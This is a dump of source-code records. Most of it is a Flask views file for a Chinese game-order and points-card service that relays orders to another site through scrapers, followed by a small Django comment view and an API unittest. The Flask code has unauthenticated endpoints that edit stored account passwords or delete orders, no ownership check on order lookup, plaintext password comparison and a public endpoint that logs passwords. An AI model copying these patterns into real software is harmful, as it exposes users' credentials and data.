form.get('misstype')\n num = int(form.get('num'))\n id = str(random.randint(1000000000, 10000000000))\n\n data = {\n 'type': form.get('type'),\n 'buser': form.get('buser'),\n 'bpsw': bpsw,\n 'dive': dive,\n 'eat': eat,\n 'id': id,\n 'num': num,\n 
'misstype': misstype,\n }\n dd = DD(buser=buser, type=type, misstype=misstype, id=id, user_table_id=g.user.table_id, bpsw=bpsw, dive=dive,\n eat=eat, consume_score=consume_score, num=num)\n\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member and member.is_not_expire(): # 是月卡用户\n # 如果提交的账号为绑定的游戏账号\n if buser in [member.buser1, member.buser2]:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n dd.consume_score = 0 # 绑定账号订单消耗积分为0分\n else: # 游戏账号未绑定\n\n # 则需要判断用户积分是否够打这一订单\n if g.user.score >= consume_score:\n # 可能存在积分不够的情况\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:4] == '积分不足':\n result = request_spider(data)\n else:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n else: # 普通用户:默认提交方式\n # 先判断积分是否够提交该订单\n if g.user.score < consume_score:\n return json.dumps({'status': 400, 'message': '积分不足'})\n result = request_spider(data)\n print(result)\n # 判断是否提交成功\n if result[:7] == 'success':\n dd.intype = '等待执行'\n else:\n dd.intype = '等待提交'\n\n # 将消费信息保存到文件中\n consume_score_log(g.user.table_id, g.user.name, id, g.user.score, consume_score)\n\n g.user.score -= dd.consume_score\n if g.user.score < 0:\n return json.dumps({'status': 400, 'message': '积分不足'})\n\n # 将订单存到数据库表中\n db.session.add(dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': 'success',\n 'data': {\n 'consume_score': dd.consume_score,\n 'score': g.user.score\n }})\n\n\nbp.add_url_rule('/acd/', view_func=AcdView.as_view('acd'))\n\n\n@bp.route('/dd/')\n@login_required\ndef page5():\n return render_template('front/dd.html', userid=g.user.id)\n\n\n@bp.route('/info/')\n@login_required\ndef page6():\n db.session.commit()\n return render_template('front/info.html', name=g.user.name, score=g.user.score, user_id=g.user.id)\n\n\n@bp.route('/acd_datas/', methods=['POST'])\n@login_required\ndef acd_datas():\n acds = db.session.query(ACD).all()\n acds = [acd.to_dict() for acd in acds]\n return json.dumps(acds)\n\n\n@bp.route('/wwc_dd/', methods=['POST'])\n@login_required\ndef wwc_dds():\n db.session.commit()\n user = db.session.query(User).filter(User.id==g.user.id).first()\n if user:\n # 拿到用户的所有订单id,向原站发请求更新一遍订单\n # dds = user.dds\n # ids = list(map(lambda data: data.id, dds))\n # user_update_dd(ids)\n\n # 跟新会员订单\n # member = db.session.query(Member).filter(Member.user_id==user.id).first()\n # if member:\n # mspider.msspider.user_update_dd(ids, member.ruser)\n\n wwcs = user.dds # 该用户所有的订单\n # 拿出所有未完成的订单\n wwcs = list(filter(lambda dd: not dd.is_completed and not dd.is_deleted, wwcs))\n wwcs = list(filter(lambda dd: dd.intype!='complete', wwcs))\n wwcs = [wwc.to_dict() for wwc in wwcs]\n return json.dumps(wwcs)\n else:\n return ''\n\n\n@bp.route('/ywc_dd/', methods=['POST'])\n@login_required\ndef ywc_dds():\n db.session.commit()\n user = db.session.query(User).filter(User.id==g.user.id).first()\n ywcs = user.dds # 该用户所有的订单\n # 拿出所有已完成的订单\n ywcs = list(filter(lambda dd: dd.is_completed == True, ywcs))\n ywcs = [ywc.to_dict() for ywc in ywcs]\n return json.dumps(ywcs)\n\n\n@bp.route('/dd_fields/', methods=['POST'])\n@login_required\ndef dd_fields():\n id = request.form.get('id')\n dd = db.session.query(DD).filter(DD.id==id).first()\n return json.dumps(dd.to_dict())\n\n\n@bp.route('/clear_ywc_dd/')\n@login_required\ndef clear_dd():\n '''清除��完成订单'''\n user = db.session.query(User).filter(User.id==g.user.id).first()\n dds = db.session.query(DD).filter(DD.is_completed==True, DD.user_table_id==user.table_id).all()\n for dd in dds:\n db.session.delete(dd)\n 
db.session.commit()\n return 'success'\n\n\nclass LoginView(views.MethodView):\n def get(self):\n return render_template('front/login.html')\n\n def post(self):\n form = request.form\n name = form.get('username')\n password = form.get('password')\n try:\n user = db.session.query(User).filter(User.name==name).first()\n if user and user.check_password(password):\n session['id'] = user.id\n return redirect(url_for('front_bp.index'))\n except Exception as err:\n db.session.rollback()\n return render_template('front/login.html', error=\"登陆信息有误,请重试\")\n\n\nbp.add_url_rule('/login/', view_func=LoginView.as_view('login'))\n\n\n@bp.route('/captcha/')\ndef captcha():\n text, image = Captcha.gene_graph_captcha()\n out = BytesIO()\n image.save(out, 'png')\n out.seek(0)\n resp = make_response(out.read())\n resp.content_type = 'image/png'\n global g_captcha\n g_captcha = text.lower()\n return resp\n\n\nclass RegisterView(views.MethodView):\n def get(self):\n return render_template(\"front/register.html\")\n\n def post(self):\n form = request.form\n name = form.get('name')\n password = form.get('password')\n repassword = form.get('repassword')\n # captcha = form.get('captcha').lower()\n resp = {\n \"code\": 200,\n \"message\": \"\",\n \"data\": {\n }\n }\n # 判断用户名是否存在\n user = db.session.query(User).filter(User.name==name).first()\n global g_captcha\n # if captcha != g_captcha:\n # resp['message'] = 'captcha error'\n if user:\n resp['message'] = 'name exists'\n elif password != repassword:\n resp['message'] = 'password not equal'\n else:\n user = User(id=str(uuid()), name=name, password=password, score=0)\n try:\n db.session.add(user)\n db.session.commit()\n resp['message'] = 'success'\n except Exception as err:\n print(err)\n db.session.rollback()\n resp['message'] = 'fail'\n return json.dumps(resp)\n\n\nbp.add_url_rule('/register/', view_func=RegisterView.as_view('register'))\nbp.add_url_rule('/gl/', view_func=GlView.as_view('gl'))\nbp.add_url_rule('/jq/', view_func=JqView.as_view('jq'))\n\n\nfrom datetime import datetime\nfrom csv import writer\n\n\ndef recharge_record_to_file(card_id, user_name, score, score_r, score_h, datetime):\n '''将充值记录保存到records.csv文件中'''\n with open('records.csv', 'a', encoding='utf-8', newline='') as af:\n wf = writer(af)\n wf.writerow([card_id, user_name, datetime, score, score_r, score_h])\n\n\n@bp.route('/charge/')\n@login_required\ndef charge():\n form = request.args\n resp = {\n 'status': 200,\n 'message': '',\n 'data': '',\n }\n card_id = form.get('card_id').strip()\n\n user = db.session.query(User).filter(User.id==g.user.id).first()\n card = db.session.query(PointCard).filter(PointCard.id==card_id).first()\n mmcard = db.session.query(MMCard).filter(MMCard.cnumber==card_id).first()\n\n if card and card.is_delete==False: # 如果卡存在,则充值\n score_r = user.score # 客户充值前的积分\n score = int(card.card.replace('test', '').replace('p',''))\n try:\n # 提交充值结果\n user.score += score\n card.is_delete = True\n db.session.commit()\n except Exception as err:\n db.session.rollback()\n resp['message'] = '充值失败'\n\n # 判断时候充值成功\n # 充值后的积分 - 充值前的积分 == 卡的积分, 判断时候充值成功\n if user.score - score_r == score:\n recharge_record_to_file(card_id=card_id, \\\n user_name=user.name, \\\n score=score, \\\n score_r = score_r, \\\n score_h = user.score, \\\n datetime=datetime.now())\n resp['message'] = '充值成功'\n else:\n resp['message'] = '充值失败'\n resp['status'] = 400\n\n # 月卡逻辑代码\n elif mmcard and mmcard.is_use == False:\n # 先把本站月卡设为已使用,避免重复提交\n mmcard.is_use = True\n db.session.commit()\n try:\n # 
先查找数据库中是否存在该用户对应的会员\n member = db.session.query(Member).filter(Member.user_id==user.id).first()\n\n # 从数据库中���出一张原站对应的月卡\n rmcard = db.session.query(RMCard).filter(RMCard.is_use==False).first()\n\n # 如果不存在,则创建对应的会员实体\n if not member:\n ruser = mspider.msspider.register()\n if ruser is None: # 注册失败\n return json.dumps({'status': 400, 'message': '激活失败,请重试!'})\n\n # 为激活用户创建一个会员实体\n member = Member(\n user_id=user.id,\n ruser=ruser\n )\n member.create_time = datetime.now()\n member.add_time(0)\n db.session.add(member)\n db.session.commit()\n\n # 将充值请求发到原站\n result = mspider.msspider.recharge_mcard(ruser, rmcard.cnumber)\n # 如果月卡充值成功,原站月卡才设为已使用过\n if result == 'success':\n rmcard.is_use = True # 原站月卡设为已使用\n member.add_time(31) # 会员账号延长31天\n user.score += 200 # 激活成功添加200分\n db.session.commit()\n resp['message'] = '月卡激活成功'\n else:\n resp['message'] = result\n\n # 如果数据库中存在会员记录\n # 会员没到期\n elif member and member.is_not_expire():\n # 将充值请求发到原站\n result = mspider.msspider.recharge_mcard(member.ruser, rmcard.cnumber)\n if result == 'success':\n rmcard.is_use = True\n user.score += 200\n member.add_time(31)\n db.session.commit()\n resp['message'] = '月卡激活成功'\n else:\n resp['message'] = result\n\n # 会员到期了,则把当前时间设为开通会员的时间,然后在加31天有效期\n else:\n # 将充值请求发到原站\n result = mspider.msspider.recharge_mcard(member.ruser, rmcard.cnumber)\n if result == 'success':\n rmcard.is_use = True\n member.create_time = datetime.now()\n member.add_time(31)\n user.score += 200\n db.session.commit()\n\n resp['message'] = '月卡激活成功'\n else:\n resp['message'] = result\n except Exception as err:\n resp['status'] = 400\n resp['message'] = '激活发生了异常,重试就好了'\n else:\n resp['status'] = 400\n resp['message'] = '卡号不存在或已使用过,请找相关人员补发'\n return json.dumps(resp)\n\n\n@bp.route('/search/')\n@login_required\ndef search():\n card_id = request.args.get('card_id').strip()\n card = db.session.query(PointCard).filter(PointCard.id==card_id).first()\n mcard = db.session.query(MMCard).filter(MMCard.cnumber==card_id).first()\n resp = {\n 'code': 200,\n 'message': '',\n 'data': '',\n }\n\n # 如果是积分卡\n if card and card.is_delete == False:\n score = int(card.card.replace('test', '').replace('p', ''))\n resp['message'] = \"你可以使用此卡\\n类型:积分卡\\n积分为\" + str(score)\n elif mcard and mcard.is_use == False:\n resp['message'] = \"你可以使用此卡\\n类型:月卡\\n时常:31天\\n获得积分200分\"\n else:\n resp['message'] = '卡号不存在'\n return json.dumps(resp)\n\n\n@bp.route('/logout/')\ndef logout():\n try:\n del session['id']\n except Exception as err:\n flask.abort(500)\n print(err)\n return redirect(url_for('front_bp.login'))\n\n\n@bp.route('/continue_dd/')\n@login_required\ndef continue_dd():\n dd_id = request.args.get('dd_id')\n dd = db.session.query(DD).filter(DD.id==dd_id).first()\n member = db.session.query(Member).filter(Member.user_id==g.user.id).first()\n\n # 1. 如果订单状态为等待提交,用户点击继续订单,尝试把订单往原站提交\n # 2. 
如果订单状态不为等待提交,用户点击继续订单,则向原站发送继续订单请求\n if dd:\n # 1\n if dd.intype == '等待提交':\n # 如果存在对应的会员账号,则尝试向用会员账号发请求\n if member:\n result = mspider.msspider.commit_dd(member.ruser, dd)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n\n # 向原站发送请求,提交订单\n result = reuqest_dd_spider(dd)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n\n # 以上都没成功则返回\n return '存在未完成的订单'\n\n else:\n if member: # 如果该用户存在对应的原站账号,则也尝试提交\n result = mspider.msspider.continue_dd(member.ruser, dd_id)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n\n result = spider_continue_dd(dd_id)\n if result[:7] == 'success':\n dd.intype = '等待执行'\n db.session.commit()\n return 'success'\n else:\n return result\n else:\n return '订单不存在'\n\n\n@bp.route('/delete_dd/')\n@login_required\ndef delete_id():\n dd_id = request.args.get('dd_id')\n dd = db.session.query(DD).filter(DD.id == dd_id).first()\n # 如果订单存在且状态为“等待提交”,则删除订单退回积分\n if dd:\n if dd.intype == '等待提交':\n user = db.session.query(User).filter(User.table_id == dd.user_table_id).first()\n user.score += dd.consume_score\n db.session.delete(dd)\n db.session.commit()\n return 'success score'\n\n # 否则向原站发送删除订单请求\n else:\n member = db.session.query(Member).filter(Member.user_id == g.user.id).first()\n if member:\n result = mspider.msspider.delete_dd(member.ruser, dd_id)\n if result=='success':\n return 'success'\n elif result[:5] == '等待执行中':\n return '等待执行中,无法删除'\n\n result = spider_delete_dd(dd_id)\n if result == 'success':\n return 'success'\n return result\n else:\n return '订单不存在'\n\n\n@bp.route('/help/')\ndef help():\n return render_template('front/help.html')\n\n\nclass EmailBindView(views.MethodView):\n decorators = [login_required]\n def get(self):\n return render_template('front/email_bind.html')\n\n def post(self):\n print(request.form)\n email = request.form.get('email')\n captcha = request.form.get('captcha')\n if captcha and captcha.strip() == mc.get(email):\n id = session.get('id')\n if id:\n user = db.session.query(User).filter(User.id==id).first()\n user.email = email\n db.session.commit()\n print('#'*30, user)\n return 'success'\n return '验证码不正确'\n\n\nbp.add_url_rule('/email_bind/', view_func=EmailBindView.as_view('email_bind'), endpoint='/email_bind/')\n\n\n@bp.route('/send_captcha/')\n@login_required\ndef send_captcha():\n email = request.args.get('email')\n captcha = random.randint(10000, 100000)\n mc.set(email, str(captcha))\n send_mail.delay('绑定邮箱验证码', [email], '技术小哥告诉你验证码是:'+str(captcha)+' 有效期10分钟')\n return 'success'\n\n\n@bp.route('/del_dd/')\n@login_required\ndef del_dd():\n id = request.args.get('id')\n dd = db.session.query(DD).filter(DD.id==id).first()\n if dd and dd.user_table_id==g.user.table_id:\n db.session.delete(dd)\n db.session.commit()\n return 'success'\n else:\n return '订单不存在'\n\n\n@bp.route('/identity/')\ndef identity():\n user_id = request.args.get('user_id')\n member = db.session.query(Member).filter(Member.user_id==user_id).first()\n if member and member.is_not_expire():\n return json.dumps({'status': 200, 'message': 'member', 'expire_time': str(member.expire_time)})\n else:\n return json.dumps({'status': 200, 'message': 'not member'})\n\n\n@bp.route('/QDIrsk9WjB.txt/')\ndef send_static_txt():\n return send_file('QDIrsk9WjB.txt')\n\n\nclass StudioDDView(views.MethodView):\n decorators = [studio_login_required]\n def get(self):\n studio_user = g.studio_user\n dds = 
db.session.query(StudioDD).filter(StudioDD.studio_user_id==studio_user.id).order_by(StudioDD.create_time.desc()).all()\n types = db.session.query(StudioDD.type).group_by(StudioDD.type).all()\n context = {\n 'dds': dds,\n 'types': types\n }\n return render_template('front/studio_dd.html', **context)\n\n\nclass StudioLoginView(views.MethodView):\n def get(self):\n return render_template('front/studio_login.html')\n\n def post(self):\n form = StudioLoginForm(request.form)\n if form.validate():\n username = form.username.data\n password = form.password.data\n\n studio_user = db.session.query(StudioUser).filter(\n StudioUser.username==username,\n StudioUser.password==password\n ).first()\n if studio_user:\n session['studio_user_id'] = studio_user.id\n return json.dumps({'status': 200, 'message': \"登陆成功!\", 'href': '/studio_dd/'})\n return json.dumps({'status': 404, 'message': \"账号不存在!\"})\n return json.dumps({'status': 400, 'message': form.get_error()})\n\n\nclass SetStudioDDIntypeView(views.MethodView):\n '''设置工作室订单的状态'''\n def post(self):\n ids = request.form.get('ids')\n intype = request.form.get('intype')\n\n for id in ids.split(','):\n studio_dd = db.session.query(StudioDD).filter(StudioDD.id==id).first()\n if studio_dd:\n studio_dd.intype = intype\n\n # 如果订单存在手机号,则发送短信通知\n if studio_dd.telephone:\n telephone = studio_dd.telephone\n\n # 根据不同的状态,发送不同的短信通知\n if intype == '已经开工':\n ali_sms.send_eat_start(telephone)\n elif intype == '账号信息有误':\n ali_sms.send_error(telephone)\n elif intype == '已经吃完苹果':\n ali_sms.send_eat_all_apple(telephone)\n elif intype == '订单已完成':\n ali_sms.send_complate2(telephone)\n else:\n pass\n\n db.session.commit()\n return json.dumps({'status': 200, 'message': \"设置成功!\"})\n\n\nclass DelDDView(views.MethodView):\n '''删除订单'''\n def post(self):\n ids = request.form.get('ids')\n intype = request.form.get('intype')\n\n for id in ids.split(','):\n studio_dd = db.session.query(StudioDD).filter(StudioDD.id==id).first()\n if studio_dd:\n db.session.delete(studio_dd)\n db.session.commit()\n return json.dumps({'status': 200, 'message': \"删除成功!\"})\n\n\nclass FilterStudioDDView(views.MethodView):\n '''筛选订单'''\n def post(self):\n intype = request.form.get('intype')\n type = request.form.get('type')\n\n if intype:\n if intype == '全部订单':\n studio_dds = db.session.query(StudioDD).filter(StudioDD.studio_user_id==g.studio_user.id)\\\n .order_by(StudioDD.create_time.desc()).all()\n else:\n studio_dds = db.session.query(StudioDD).filter(StudioDD.intype==intype, StudioDD.studio_user_id==g.studio_user.id)\\\n .order_by(StudioDD.create_time.desc()).all()\n elif type:\n studio_dds = db.session.query(StudioDD).filter(StudioDD.type.like('%' + type + '%'), StudioDD.studio_user_id==g.studio_user.id)\\\n .order_by(StudioDD.create_time.desc()).all()\n else:\n studio_dds = db.session.query(StudioDD).all()\n\n studio_dds_dic = list(map(lambda obj: obj.to_dict(), studio_dds))\n return json.dumps({'status': 200, 'message': \"返回的数据从data里拿!\", 'data': studio_dds_dic})\n\n\nclass EditorStudioDDView(views.MethodView):\n\n def post(self):\n dd_id = request.form.get('dd_id', type=int)\n buser = request.form.get('buser')\n bpsw = request.form.get('bpsw')\n\n studio_dd = db.session.query(StudioDD).filter(StudioDD.id==dd_id).first()\n if studio_dd:\n studio_dd.buser = buser\n studio_dd.bpsw = bpsw\n db.session.commit()\n return json.dumps({'status': 200, 'message': \"修改成功!\"})\n return json.dumps({'status': 404, 'message': \"订单不存在\"})\n\n\nfrom werkzeug.security import generate_password_hash, 
check_password_hash\n@bp.route('/check_password/')\ndef check_password():\n password = request.args.get('password', default='')\n pwhash = request.args.get('pwhash', default='')\n print(password)\n print(check_password_hash(pwhash=pwhash, password=password))\n return 'yes' if check_password_hash(pwhash=pwhash, password=password) else 'no'\n\n\nbp.add_url_rule('/studio_dd/', view_func=StudioDDView.as_view('studio_dd'), endpoint='studio_dd')\nbp.add_url_rule('/studio_login/', view_func=StudioLoginView.as_view('studio_login'), endpoint='studio_login')\nbp.add_url_rule('/set_studio_dd_intype/', view_func=SetStudioDDIntypeView.as_view('set_studio_dd_intype'))\nbp.add_url_rule('/del_studio_dd/', view_func=DelDDView.as_view('del_studio_dd'))\nbp.add_url_rule('/filter_dd/', view_func=FilterStudioDDView.as_view('filter_dd'))\nbp.add_url_rule('/editor_dd/', view_func=EditorStudioDDView.as_view('editor_dd'))\n\n","sub_path":"apps/front/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":37084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645416124","text":"from django.shortcuts import render\nfrom django.utils import timezone\nfrom django.http import HttpResponse\n\nfrom lan2015.models import Announcement\nfrom lan2015.models import Comment\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport json\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, 'lan2015/login.html')\n\n\n@csrf_exempt\ndef main(request):\n announcements = Announcement.objects.order_by('pub_date');\n comments = Comment.objects.order_by('pub_date');\n context = {'announcements': announcements, 'comments': comments}\n return render(request, 'lan2015/stammlan-2015/index.html', context)\n\n\n@csrf_exempt\ndef sendComment(request):\n results = {}\n if request.method == 'POST':\n commentName = request.POST.get('commentName')\n commentText = request.POST.get('commentText')\n commentColor= request.POST.get('commentColor')\n\n c = Comment()\n c.userName = commentName\n c.text = commentText\n c.color= commentColor\n c.pub_date = timezone.now()\n\n c.save()\n results['commentName'] = c.userName\n results['commentText'] = c.text\n results['commentColor']= c.color\n results['commentDate'] = c.pub_date.strftime(\"%Y-%m-%d %H:%M\")\n\n j = json.dumps(results)\n return HttpResponse(j, content_type='application/json')\n","sub_path":"lan2015/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"417385989","text":"import requests\n\nfrom api.config.readconfig import ReadConfig\nimport unittest\n\nclass testsupportcenter(unittest.TestCase):\n def test_supportCenter(self):\n access_token=ReadConfig().get_value(\"params\",\"access_token\")\n ip = ReadConfig().get_value(\"url\",\"ip\")\n adi = \"v1.3/svocloud/support/room\"\n url = \"/\".join((ip , adi))\n header = {\"Content-Type\": \"application/json\",\n \"Authorization\": (\"Bearer\" + \" \" + access_token),\n \"token\": access_token ,\n \"terminalType\":\"mobile\"\n }\n\n#the ip is changed from v 1.2 to v1.3\n r = requests.get(url,headers=header,verify = False)\n print(r.text)\n self.assertEqual(200,r.status_code)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()","sub_path":"app_api/alltestcase/Double_check/test_SVOC_SupportCenter.py","file_name":"test_SVOC_SupportCenter.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}